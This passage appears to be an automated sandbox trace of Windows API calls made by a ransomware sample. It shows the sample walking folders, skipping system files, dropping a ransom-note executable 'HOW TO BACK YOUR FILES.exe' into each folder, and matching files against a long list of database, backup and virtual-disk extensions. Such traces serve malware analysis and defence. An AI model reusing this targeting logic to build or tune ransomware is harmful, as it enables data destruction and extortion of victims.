(lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0082.923] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0082.923] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="windows") returned -1 [0082.923] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="bootmgr") returned 1 [0082.923] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="temp") returned 1 [0082.923] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="pagefile.sys") returned 1 [0082.923] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="boot") returned 1 [0082.923] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="ids.txt") returned 1 [0082.923] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="ntuser.dat") returned 1 [0082.923] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="perflogs") returned 1 [0082.923] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="MSBuild") returned 1 [0082.923] lstrlenW (lpString="vcRuntimeMinimum_x86") returned 20 [0082.923] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*") returned 93 [0082.923] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="vcRuntimeMinimum_x86" | out: lpString1="vcRuntimeMinimum_x86") returned="vcRuntimeMinimum_x86" [0082.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0082.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe2) returned 0x2c8eb8 [0082.923] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0082.923] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0082.923] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0082.923] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0082.923] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0082.925] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0082.925] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0082.925] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned 112 [0082.925] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0082.925] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0082.925] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0082.925] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0082.926] GetLastError () returned 0x0 [0082.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0082.926] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0082.926] CloseHandle (hObject=0x120) returned 1 [0082.926] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0082.926] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0082.926] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0082.926] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.926] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0082.926] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.926] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.926] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.926] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0082.926] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.926] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.926] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc6500, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x50cc6500, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x50cc6500, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0xf36be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0082.926] lstrcmpiW (lpString1="cab1.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.926] lstrcmpiW (lpString1="cab1.cab", lpString2="aoldtz.exe") returned 1 [0082.926] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0082.926] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0082.926] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0082.926] lstrcmpiW (lpString1="cab1.cab", lpString2="bootmgr") returned 1 [0082.927] lstrcmpiW (lpString1="cab1.cab", lpString2="temp") returned -1 [0082.927] lstrcmpiW (lpString1="cab1.cab", lpString2="pagefile.sys") returned -1 [0082.927] lstrcmpiW (lpString1="cab1.cab", lpString2="boot") returned 1 [0082.927] lstrcmpiW (lpString1="cab1.cab", lpString2="ids.txt") returned -1 [0082.927] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0082.927] lstrcmpiW (lpString1="cab1.cab", lpString2="perflogs") returned -1 [0082.927] lstrcmpiW (lpString1="cab1.cab", lpString2="MSBuild") returned -1 [0082.927] lstrlenW (lpString="cab1.cab") returned 8 [0082.927] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*") returned 114 [0082.927] lstrcpyW (in: lpString1=0x2cce4e2, lpString2="cab1.cab" | out: lpString1="cab1.cab") returned="cab1.cab" [0082.927] lstrlenW (lpString="cab1.cab") returned 8 [0082.927] lstrlenW (lpString="Ares865") returned 7 [0082.927] lstrcmpiW (lpString1="ab1.cab", lpString2="Ares865") returned -1 [0082.927] lstrlenW (lpString=".dll") returned 4 [0082.927] lstrcmpiW (lpString1="cab1.cab", lpString2=".dll") returned 1 [0082.927] lstrlenW (lpString=".lnk") returned 4 [0082.927] lstrcmpiW (lpString1="cab1.cab", lpString2=".lnk") returned 1 [0082.927] lstrlenW (lpString=".ini") returned 4 [0082.927] lstrcmpiW (lpString1="cab1.cab", lpString2=".ini") returned 1 [0082.927] lstrlenW (lpString=".sys") returned 4 [0082.927] lstrcmpiW (lpString1="cab1.cab", lpString2=".sys") returned 1 [0082.927] lstrlenW (lpString="cab1.cab") returned 8 [0082.927] lstrlenW (lpString="bak") returned 3 [0082.927] lstrcmpiW (lpString1="cab", lpString2="bak") returned 1 [0082.927] lstrlenW (lpString="ba_") returned 3 [0082.927] lstrcmpiW (lpString1="cab", lpString2="ba_") returned 1 [0082.927] lstrlenW (lpString="dbb") returned 3 [0082.927] lstrcmpiW (lpString1="cab", lpString2="dbb") returned -1 [0082.927] lstrlenW (lpString="vmdk") returned 4 [0082.927] lstrcmpiW (lpString1=".cab", lpString2="vmdk") returned -1 [0082.927] lstrlenW (lpString="rar") returned 3 [0082.927] lstrcmpiW (lpString1="cab", lpString2="rar") returned -1 [0082.927] lstrlenW (lpString="zip") returned 3 [0082.927] lstrcmpiW (lpString1="cab", lpString2="zip") returned -1 [0082.927] lstrlenW (lpString="tgz") returned 3 [0082.927] lstrcmpiW (lpString1="cab", lpString2="tgz") returned -1 [0082.928] lstrlenW (lpString="vbox") returned 4 [0082.928] lstrcmpiW (lpString1=".cab", lpString2="vbox") returned -1 [0082.928] lstrlenW (lpString="vdi") returned 3 [0082.928] lstrcmpiW (lpString1="cab", lpString2="vdi") returned -1 [0082.928] lstrlenW (lpString="vhd") returned 3 [0082.928] lstrcmpiW (lpString1="cab", lpString2="vhd") returned -1 [0082.928] lstrlenW (lpString="vhdx") returned 4 [0082.928] lstrcmpiW (lpString1=".cab", lpString2="vhdx") returned -1 [0082.928] lstrlenW (lpString="avhd") returned 4 [0082.928] lstrcmpiW (lpString1=".cab", lpString2="avhd") returned -1 [0082.928] lstrlenW (lpString="db") returned 2 [0082.928] lstrcmpiW (lpString1="ab", lpString2="db") returned -1 [0082.928] lstrlenW (lpString="db2") returned 3 [0082.928] lstrcmpiW (lpString1="cab", lpString2="db2") returned -1 [0082.928] lstrlenW (lpString="db3") returned 3 [0082.928] lstrcmpiW (lpString1="cab", lpString2="db3") returned -1 [0082.928] lstrlenW (lpString="dbf") returned 3 [0082.928] lstrcmpiW (lpString1="cab", lpString2="dbf") returned -1 [0082.928] lstrlenW (lpString="mdf") returned 3 [0082.928] lstrcmpiW (lpString1="cab", lpString2="mdf") returned -1 [0082.928] lstrlenW (lpString="mdb") returned 3 [0082.928] lstrcmpiW (lpString1="cab", lpString2="mdb") returned -1 [0082.928] lstrlenW (lpString="sql") returned 3 [0082.928] lstrcmpiW (lpString1="cab", lpString2="sql") returned -1 [0082.928] lstrlenW (lpString="sqlite") returned 6 [0082.928] lstrcmpiW (lpString1="b1.cab", lpString2="sqlite") returned -1 [0082.928] lstrlenW (lpString="sqlite3") returned 7 [0082.928] lstrcmpiW (lpString1="ab1.cab", lpString2="sqlite3") returned -1 [0082.928] lstrlenW (lpString="sqlitedb") returned 8 [0082.928] lstrlenW (lpString="xml") returned 3 [0082.928] lstrcmpiW (lpString1="cab", lpString2="xml") returned -1 [0082.928] lstrlenW (lpString="$er") returned 3 [0082.928] lstrcmpiW (lpString1="cab", lpString2="$er") returned 1 [0082.928] lstrlenW (lpString="4dd") returned 3 [0082.928] lstrcmpiW (lpString1="cab", lpString2="4dd") returned 1 [0082.928] lstrlenW (lpString="4dl") returned 3 [0082.928] lstrcmpiW (lpString1="cab", lpString2="4dl") returned 1 [0082.928] lstrlenW (lpString="^^^") returned 3 [0082.929] lstrcmpiW (lpString1="cab", lpString2="^^^") returned 1 [0082.929] lstrlenW (lpString="abs") returned 3 [0082.929] lstrcmpiW (lpString1="cab", lpString2="abs") returned 1 [0082.929] lstrlenW (lpString="abx") returned 3 [0082.929] lstrcmpiW (lpString1="cab", lpString2="abx") returned 1 [0082.929] lstrlenW (lpString="accdb") returned 5 [0082.929] lstrcmpiW (lpString1="1.cab", lpString2="accdb") returned -1 [0082.929] lstrlenW (lpString="accdc") returned 5 [0082.929] lstrcmpiW (lpString1="1.cab", lpString2="accdc") returned -1 [0082.929] lstrlenW (lpString="accde") returned 5 [0082.929] lstrcmpiW (lpString1="1.cab", lpString2="accde") returned -1 [0082.929] lstrlenW (lpString="accdr") returned 5 [0082.929] lstrcmpiW (lpString1="1.cab", lpString2="accdr") returned -1 [0082.929] lstrlenW (lpString="accdt") returned 5 [0082.929] lstrcmpiW (lpString1="1.cab", lpString2="accdt") returned -1 [0082.929] lstrlenW (lpString="accdw") returned 5 [0082.929] lstrcmpiW (lpString1="1.cab", lpString2="accdw") returned -1 [0082.929] lstrlenW (lpString="accft") returned 5 [0082.929] lstrcmpiW (lpString1="1.cab", lpString2="accft") returned -1 [0082.929] lstrlenW (lpString="adb") returned 3 [0082.929] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0082.929] lstrlenW (lpString="adb") returned 3 [0082.929] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0082.929] lstrlenW (lpString="ade") returned 3 [0082.929] lstrcmpiW (lpString1="cab", lpString2="ade") returned 1 [0082.929] lstrlenW (lpString="adf") returned 3 [0082.929] lstrcmpiW (lpString1="cab", lpString2="adf") returned 1 [0082.929] lstrlenW (lpString="adn") returned 3 [0082.929] lstrcmpiW (lpString1="cab", lpString2="adn") returned 1 [0082.929] lstrlenW (lpString="adp") returned 3 [0082.929] lstrcmpiW (lpString1="cab", lpString2="adp") returned 1 [0082.929] lstrlenW (lpString="alf") returned 3 [0082.929] lstrcmpiW (lpString1="cab", lpString2="alf") returned 1 [0082.929] lstrlenW (lpString="ask") returned 3 [0082.929] lstrcmpiW (lpString1="cab", lpString2="ask") returned 1 [0082.929] lstrlenW (lpString="btr") returned 3 [0082.929] lstrcmpiW (lpString1="cab", lpString2="btr") returned 1 [0082.930] lstrlenW (lpString="cat") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="cat") returned -1 [0082.930] lstrlenW (lpString="cdb") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="cdb") returned -1 [0082.930] lstrlenW (lpString="ckp") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="ckp") returned -1 [0082.930] lstrlenW (lpString="cma") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="cma") returned -1 [0082.930] lstrlenW (lpString="cpd") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="cpd") returned -1 [0082.930] lstrlenW (lpString="dacpac") returned 6 [0082.930] lstrcmpiW (lpString1="b1.cab", lpString2="dacpac") returned -1 [0082.930] lstrlenW (lpString="dad") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="dad") returned -1 [0082.930] lstrlenW (lpString="dadiagrams") returned 10 [0082.930] lstrlenW (lpString="daschema") returned 8 [0082.930] lstrlenW (lpString="db-journal") returned 10 [0082.930] lstrlenW (lpString="db-shm") returned 6 [0082.930] lstrcmpiW (lpString1="b1.cab", lpString2="db-shm") returned -1 [0082.930] lstrlenW (lpString="db-wal") returned 6 [0082.930] lstrcmpiW (lpString1="b1.cab", lpString2="db-wal") returned -1 [0082.930] lstrlenW (lpString="dbc") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="dbc") returned -1 [0082.930] lstrlenW (lpString="dbs") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="dbs") returned -1 [0082.930] lstrlenW (lpString="dbt") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="dbt") returned -1 [0082.930] lstrlenW (lpString="dbv") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="dbv") returned -1 [0082.930] lstrlenW (lpString="dbx") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="dbx") returned -1 [0082.930] lstrlenW (lpString="dcb") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="dcb") returned -1 [0082.930] lstrlenW (lpString="dct") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="dct") returned -1 [0082.930] lstrlenW (lpString="dcx") returned 3 [0082.930] lstrcmpiW (lpString1="cab", lpString2="dcx") returned -1 [0082.930] lstrlenW (lpString="ddl") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="ddl") returned -1 [0082.931] lstrlenW (lpString="dlis") returned 4 [0082.931] lstrcmpiW (lpString1=".cab", lpString2="dlis") returned -1 [0082.931] lstrlenW (lpString="dp1") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="dp1") returned -1 [0082.931] lstrlenW (lpString="dqy") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="dqy") returned -1 [0082.931] lstrlenW (lpString="dsk") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="dsk") returned -1 [0082.931] lstrlenW (lpString="dsn") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="dsn") returned -1 [0082.931] lstrlenW (lpString="dtsx") returned 4 [0082.931] lstrcmpiW (lpString1=".cab", lpString2="dtsx") returned -1 [0082.931] lstrlenW (lpString="dxl") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="dxl") returned -1 [0082.931] lstrlenW (lpString="eco") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="eco") returned -1 [0082.931] lstrlenW (lpString="ecx") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="ecx") returned -1 [0082.931] lstrlenW (lpString="edb") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="edb") returned -1 [0082.931] lstrlenW (lpString="epim") returned 4 [0082.931] lstrcmpiW (lpString1=".cab", lpString2="epim") returned -1 [0082.931] lstrlenW (lpString="fcd") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="fcd") returned -1 [0082.931] lstrlenW (lpString="fdb") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="fdb") returned -1 [0082.931] lstrlenW (lpString="fic") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="fic") returned -1 [0082.931] lstrlenW (lpString="flexolibrary") returned 12 [0082.931] lstrlenW (lpString="fm5") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="fm5") returned -1 [0082.931] lstrlenW (lpString="fmp") returned 3 [0082.931] lstrcmpiW (lpString1="cab", lpString2="fmp") returned -1 [0082.931] lstrlenW (lpString="fmp12") returned 5 [0082.931] lstrcmpiW (lpString1="1.cab", lpString2="fmp12") returned -1 [0082.931] lstrlenW (lpString="fmpsl") returned 5 [0082.932] lstrcmpiW (lpString1="1.cab", lpString2="fmpsl") returned -1 [0082.932] lstrlenW (lpString="fol") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="fol") returned -1 [0082.932] lstrlenW (lpString="fp3") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="fp3") returned -1 [0082.932] lstrlenW (lpString="fp4") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="fp4") returned -1 [0082.932] lstrlenW (lpString="fp5") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="fp5") returned -1 [0082.932] lstrlenW (lpString="fp7") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="fp7") returned -1 [0082.932] lstrlenW (lpString="fpt") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="fpt") returned -1 [0082.932] lstrlenW (lpString="frm") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="frm") returned -1 [0082.932] lstrlenW (lpString="gdb") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0082.932] lstrlenW (lpString="gdb") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0082.932] lstrlenW (lpString="grdb") returned 4 [0082.932] lstrcmpiW (lpString1=".cab", lpString2="grdb") returned -1 [0082.932] lstrlenW (lpString="gwi") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="gwi") returned -1 [0082.932] lstrlenW (lpString="hdb") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="hdb") returned -1 [0082.932] lstrlenW (lpString="his") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="his") returned -1 [0082.932] lstrlenW (lpString="ib") returned 2 [0082.932] lstrcmpiW (lpString1="ab", lpString2="ib") returned -1 [0082.932] lstrlenW (lpString="idb") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="idb") returned -1 [0082.932] lstrlenW (lpString="ihx") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="ihx") returned -1 [0082.932] lstrlenW (lpString="itdb") returned 4 [0082.932] lstrcmpiW (lpString1=".cab", lpString2="itdb") returned -1 [0082.932] lstrlenW (lpString="itw") returned 3 [0082.932] lstrcmpiW (lpString1="cab", lpString2="itw") returned -1 [0082.933] lstrlenW (lpString="jet") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="jet") returned -1 [0082.933] lstrlenW (lpString="jtx") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="jtx") returned -1 [0082.933] lstrlenW (lpString="kdb") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="kdb") returned -1 [0082.933] lstrlenW (lpString="kexi") returned 4 [0082.933] lstrcmpiW (lpString1=".cab", lpString2="kexi") returned -1 [0082.933] lstrlenW (lpString="kexic") returned 5 [0082.933] lstrcmpiW (lpString1="1.cab", lpString2="kexic") returned -1 [0082.933] lstrlenW (lpString="kexis") returned 5 [0082.933] lstrcmpiW (lpString1="1.cab", lpString2="kexis") returned -1 [0082.933] lstrlenW (lpString="lgc") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="lgc") returned -1 [0082.933] lstrlenW (lpString="lwx") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="lwx") returned -1 [0082.933] lstrlenW (lpString="maf") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="maf") returned -1 [0082.933] lstrlenW (lpString="maq") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="maq") returned -1 [0082.933] lstrlenW (lpString="mar") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="mar") returned -1 [0082.933] lstrlenW (lpString="marshal") returned 7 [0082.933] lstrcmpiW (lpString1="ab1.cab", lpString2="marshal") returned -1 [0082.933] lstrlenW (lpString="mas") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="mas") returned -1 [0082.933] lstrlenW (lpString="mav") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="mav") returned -1 [0082.933] lstrlenW (lpString="maw") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="maw") returned -1 [0082.933] lstrlenW (lpString="mdbhtml") returned 7 [0082.933] lstrcmpiW (lpString1="ab1.cab", lpString2="mdbhtml") returned -1 [0082.933] lstrlenW (lpString="mdn") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="mdn") returned -1 [0082.933] lstrlenW (lpString="mdt") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="mdt") returned -1 [0082.933] lstrlenW (lpString="mfd") returned 3 [0082.933] lstrcmpiW (lpString1="cab", lpString2="mfd") returned -1 [0082.934] lstrlenW (lpString="mpd") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="mpd") returned -1 [0082.934] lstrlenW (lpString="mrg") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="mrg") returned -1 [0082.934] lstrlenW (lpString="mud") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="mud") returned -1 [0082.934] lstrlenW (lpString="mwb") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="mwb") returned -1 [0082.934] lstrlenW (lpString="myd") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="myd") returned -1 [0082.934] lstrlenW (lpString="ndf") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="ndf") returned -1 [0082.934] lstrlenW (lpString="nnt") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="nnt") returned -1 [0082.934] lstrlenW (lpString="nrmlib") returned 6 [0082.934] lstrcmpiW (lpString1="b1.cab", lpString2="nrmlib") returned -1 [0082.934] lstrlenW (lpString="ns2") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="ns2") returned -1 [0082.934] lstrlenW (lpString="ns3") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="ns3") returned -1 [0082.934] lstrlenW (lpString="ns4") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="ns4") returned -1 [0082.934] lstrlenW (lpString="nsf") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="nsf") returned -1 [0082.934] lstrlenW (lpString="nv") returned 2 [0082.934] lstrcmpiW (lpString1="ab", lpString2="nv") returned -1 [0082.934] lstrlenW (lpString="nv2") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="nv2") returned -1 [0082.934] lstrlenW (lpString="nwdb") returned 4 [0082.934] lstrcmpiW (lpString1=".cab", lpString2="nwdb") returned -1 [0082.934] lstrlenW (lpString="nyf") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="nyf") returned -1 [0082.934] lstrlenW (lpString="odb") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0082.934] lstrlenW (lpString="odb") returned 3 [0082.934] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0082.934] lstrlenW (lpString="oqy") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="oqy") returned -1 [0082.935] lstrlenW (lpString="ora") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="ora") returned -1 [0082.935] lstrlenW (lpString="orx") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="orx") returned -1 [0082.935] lstrlenW (lpString="owc") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="owc") returned -1 [0082.935] lstrlenW (lpString="p96") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="p96") returned -1 [0082.935] lstrlenW (lpString="p97") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="p97") returned -1 [0082.935] lstrlenW (lpString="pan") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="pan") returned -1 [0082.935] lstrlenW (lpString="pdb") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="pdb") returned -1 [0082.935] lstrlenW (lpString="pdm") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="pdm") returned -1 [0082.935] lstrlenW (lpString="pnz") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="pnz") returned -1 [0082.935] lstrlenW (lpString="qry") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="qry") returned -1 [0082.935] lstrlenW (lpString="qvd") returned 3 [0082.935] lstrcmpiW (lpString1="cab", 